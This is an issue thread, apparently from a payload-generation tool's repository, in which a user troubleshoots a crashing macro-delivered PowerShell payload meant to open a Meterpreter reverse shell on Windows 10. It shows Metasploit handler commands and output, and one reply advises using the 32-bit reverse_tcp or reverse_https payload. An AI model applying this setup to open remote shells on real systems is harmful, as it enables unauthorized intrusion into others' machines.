powershell.exe has stopped working when executing the payload

Question

powershell.exe has stopped working when executing the payload

Closed this issue 7 years ago · 5 comments

recently i've tried using macro to get meterpreter session. after executing macro word file, At first, i got "exploit complete but no session open". i change on metasploit as below:

set targetarchitecture x64
set payload windows/x64/meterpreter/reverse_tcp
exploit -j

then i get this:
[] Started reverse TCP handler on 0.0.0.0:4444
[] Starting the payload handler...
msf exploit(handler) > [] Encoded stage with x64/xor
[] Sending encoded stage (1189463 bytes) to 127.0.0.1
(at this point i got pop up message saying that powershell.exe has stopped working)
[-] OpenSSL::SSL::SSLError SSL_accept SYSCALL returned=5 errno=0 state=SSLv2/v3 read client hello A

how to fix this problem?

Answer 1 · 2018-02-08T15:04:38.000Z

Don't use the x64 payload, unicorn automatically downgrades the process to a 32 bit process on Windows regardless of 64 or 32 bit. It's crashing because its trying to inject 64 bit shellcode into a 32 bit process. Use the standard windows/meterpreter/reverse_tcp or reverse_https.

Answer 2 · 2018-02-09T12:45:51.000Z

using reverse_tcp and reverse_https resulting "exploit complete,but no session created" how to fix ? im attacking win10

Answer 3 · 2018-02-09T13:18:52.000Z

i fix this stuff. thank you for your replied!!!

Answer 4 · 2020-09-03T11:30:21.000Z

How did you fix it please ? I having this issue right now..

Answer 5 · 2020-12-19T23:58:55.000Z

@hackdrug how did you fix it ??